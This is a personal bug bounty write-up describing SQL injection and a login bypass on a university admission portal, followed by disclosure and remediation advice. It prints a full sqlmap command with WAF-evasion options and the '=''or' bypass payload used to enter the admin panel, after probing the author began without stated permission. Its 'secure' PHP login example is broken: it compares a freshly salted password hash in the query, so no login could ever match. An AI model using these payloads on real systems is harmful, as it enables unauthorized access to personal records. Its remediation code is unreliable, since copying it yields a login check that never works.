Disclaimer: This article is for educational purposes only. The techniques described should only be used on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.
Hi everyone, how are you? I hope you're all doing well. This time I want to share my experience regarding bug bounty hunting, and I hope my writing can be a reference for you all.
It all started when I was looking for information about entrance exams at one of the
universities, let's call it site.ac.id. During my research, I discovered two
critical vulnerabilities:
- SQL Injection
- Bypass SQL Login
University admission portal with vulnerable login system
Understanding SQL Injection
SQL Injection is a technique that exploits security vulnerabilities due to the absence of proper input filtering. This allows attackers to execute malicious SQL commands that can be used to view the contents of the website's database.
This vulnerability occurs when user input is directly incorporated into SQL queries without proper sanitization or parameterization, creating opportunities for malicious code execution.
Discovery Process
While searching for admission information, I was prompted to log in to access the required details. Out of curiosity, I began searching for admin login pages and tried various methods to gain access to the administrator dashboard.
Initial Testing
I started by inputting a single quote (') into the login form to test for SQL
injection vulnerabilities. This is a basic but effective technique for identifying potential
security flaws.
# Test payload in login form
Username: '
Password: '
University admission portal with vulnerable login system
Critical Discovery: After inputting the single quote, I received an error message that clearly indicated a SQL injection vulnerability!
Error Message Analysis
The error message I received was:
Warning: mysqli_num_rows() expects parameter 1 to be mysqli_result,
boolean given in /home/site/public_html/user/cek_login.php on line 12
This error message provided valuable information:
- Database Type: MySQL (mysqli functions)
- File Path:
/home/site/public_html/user/cek_login.php - Vulnerability Confirmation: Improper SQL query handling
Request Analysis with Developer Tools
I analyzed the request data by examining the Network tab in Web Developer Tools (Ctrl + Shift + I). This allowed me to understand the structure of the login request and identify the parameters being sent to the server.
# HTTP POST request structure
POST /user/cek_login.php HTTP/1.1
Host: www.site.ac.id
Content-Type: application/x-www-form-urlencoded
email=test@example.com&password=password123
University admission portal with vulnerable login system
SQLmap Exploitation
After confirming the vulnerability, I proceeded to use SQLmap, a powerful automated SQL injection tool, to extract database information.
SQLmap - automated SQL injection exploitation tool
SQLmap Command Execution
sqlmap -u "https://www.site.ac.id/user/cek_login.php" \
--data="email=a&password=a" \
--random-agent \
--tamper=space2comment \
--sql-query="database()"
Let me break down this command:
- -u: Target URL
- --data: POST data parameters
- --random-agent: Use random User-Agent headers
- --tamper=space2comment: Replace spaces with SQL comments
- --sql-query: Execute specific SQL query
University admission portal with vulnerable login system
Success: After waiting for some time, I successfully obtained the database name from www.site.ac.id!
SQL Login Bypass Discovery
SQL Login Bypass is a technique where attackers can input SQL characters into login forms to gain unauthorized access to admin dashboards without using legitimate credentials.
Bypass Technique
I used the classic SQL injection payload '=''or' in both the username and
password fields:
# Login bypass payload
Username: '=''or'
Password: '=''or'
This payload works by manipulating the SQL query logic. The original query likely looked like:
SELECT * FROM users WHERE username='$username' AND password='$password'
With our payload, it becomes:
SELECT * FROM users WHERE username=''=''or'' AND password=''=''or''
Bypass Success: After inputting the payload, I was immediately redirected to the admin panel, confirming that the login form was vulnerable to SQL injection bypass!
Inject bypass sql
Successfully bypassed login and gained admin access
Impact Assessment
The discovered vulnerabilities had severe security implications:
SQL Injection Impact
- Data Exposure: Access to sensitive student and staff information
- Database Manipulation: Potential to modify or delete critical data
- System Information: Database structure and configuration details
- Privilege Escalation: Possible access to administrative functions
Login Bypass Impact
- Unauthorized Access: Complete admin panel access without credentials
- Administrative Control: Full system management capabilities
- Data Breach: Access to confidential academic records
- System Compromise: Potential for further exploitation
Responsible Disclosure
Following ethical hacking principles, I immediately reported these critical vulnerabilities to the university through their official channels.
Timeline
📅 February 23, 2022: Sent bug report to site.ac.id
✅ February 24, 2022: University responded and validated the bugs
🏆 March 23, 2022: Received certificate of appreciation as reward
Note: The development team gave me permission to disclose this report without mentioning their specific details or identity.
Prevention and Remediation
To prevent similar vulnerabilities, organizations should implement comprehensive security measures:
SQL Injection Prevention
- Parameterized Queries: Use prepared statements with bound parameters
- Input Validation: Sanitize and validate all user inputs
- Least Privilege: Database users should have minimal necessary permissions
- Error Handling: Implement proper error handling without exposing system details
Authentication Security
- Strong Authentication: Implement robust login mechanisms
- Multi-Factor Authentication: Add additional security layers
- Session Management: Secure session handling and timeout controls
- Access Controls: Proper authorization and privilege management
Secure Code Example
// Secure PHP login code example
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->execute([$username, password_hash($password, PASSWORD_DEFAULT)]);
$user = $stmt->fetch();
if ($user && password_verify($password, $user['password'])) {
// Login successful
} else {
// Login failed
}
Tools and Techniques Used
Testing Tools
- Browser Developer Tools: Request/response analysis
- SQLmap: Automated SQL injection testing
- Manual Testing: Custom payload crafting
- Burp Suite: Web application security testing (alternative)
Testing Methodology
- Reconnaissance: Information gathering and target analysis
- Vulnerability Discovery: Manual and automated testing
- Exploitation: Proof of concept development
- Documentation: Comprehensive reporting
- Responsible Disclosure: Ethical vulnerability reporting
Lessons Learned
This bug bounty experience taught me several valuable lessons:
- Basic Techniques Work: Simple payloads can reveal critical vulnerabilities
- Educational Institutions: Often have valuable systems with security gaps
- Error Messages: Provide crucial information for exploitation
- Responsible Disclosure: Builds trust and positive relationships
- Documentation: Proper reporting leads to recognition and rewards
Conclusion
This successful bug bounty hunt demonstrates how curiosity and systematic testing can lead to the discovery of critical security vulnerabilities. The combination of SQL injection and authentication bypass created a severe security risk for the university's admission system.
The experience reinforced the importance of:
- Proactive Security Testing: Regular vulnerability assessments are essential
- Input Validation: All user inputs must be properly sanitized
- Secure Coding Practices: Following established security guidelines
- Error Handling: Preventing information disclosure through error messages
- Ethical Hacking: Using skills responsibly to improve security
For aspiring bug bounty hunters, this case study shows that sometimes the most straightforward approaches yield the best results. Don't overlook basic testing techniques in favor of complex exploits – often, the simplest methods reveal the most critical vulnerabilities.
Continuous learning and ethical practices in cybersecurity
Maybe that's all from me, hopefully this can be a reference for you all and sorry if there are things that are not clear. I'm RyuuKhagetsu, see you in the next article.
